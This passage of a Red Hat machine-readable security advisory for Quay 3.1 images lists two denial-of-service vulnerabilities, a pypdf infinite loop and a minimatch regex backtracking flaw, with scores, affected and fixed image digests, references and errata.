"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2442543"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in pypdf. Processing a specially crafted PDF document, specifically with circular /Prev references in the cross-reference (xref) chain, can cause an infinite loop and a high consumption of CPU, resulting in a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "pypdf: possible infinite loop when loading circular /Prev entries in cross-reference streams",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "To exploit this flaw, an attacker must be able to supply a crafted PDF file to be processed by an application using the pypdf library. This issue can cause the application to enter an infinite loop and consume a high amount of CPU resources, eventually resulting in a denial of service with no other security impact. Due to these reasons, this vulnerability has been rated with a moderate impact.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
],
"known_not_affected": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-27628"
},
{
"category": "external",
"summary": "RHBZ#2442543",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442543"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-27628",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27628"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-27628",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27628"
},
{
"category": "external",
"summary": "https://github.com/py-pdf/pypdf/commit/0fbd95938724ad2d72688d4112207c0590f0483f",
"url": "https://github.com/py-pdf/pypdf/commit/0fbd95938724ad2d72688d4112207c0590f0483f"
},
{
"category": "external",
"summary": "https://github.com/py-pdf/pypdf/issues/3654",
"url": "https://github.com/py-pdf/pypdf/issues/3654"
},
{
"category": "external",
"summary": "https://github.com/py-pdf/pypdf/security/advisories/GHSA-2rw7-x74f-jg35",
"url": "https://github.com/py-pdf/pypdf/security/advisories/GHSA-2rw7-x74f-jg35"
}
],
"release_date": "2026-02-25T02:45:37.543000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-24T18:02:58+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:5665"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "pypdf: possible infinite loop when loading circular /Prev entries in cross-reference streams"
},
{
"cve": "CVE-2026-27904",
"cwe": {
"id": "CWE-1333",
"name": "Inefficient Regular Expression Complexity"
},
"discovery_date": "2026-02-26T02:01:23.004531+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2442922"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in minimatch. A remote attacker could exploit this vulnerability by providing a specially crafted glob expression with nested unbounded quantifiers. This could lead to catastrophic backtracking in the V8 JavaScript engine, causing the application to become unresponsive and resulting in a Denial of Service (DoS).",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "minimatch: Minimatch: Denial of Service via catastrophic backtracking in glob expressions",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Exploitation of this flaw requires that a user or service processes untrusted input.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
],
"known_not_affected": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-27904"
},
{
"category": "external",
"summary": "RHBZ#2442922",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442922"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-27904",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27904"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-27904",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27904"
},
{
"category": "external",
"summary": "https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74",
"url": "https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74"
}
],
"release_date": "2026-02-26T01:07:42.693000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-24T18:02:58+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:5665"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64",
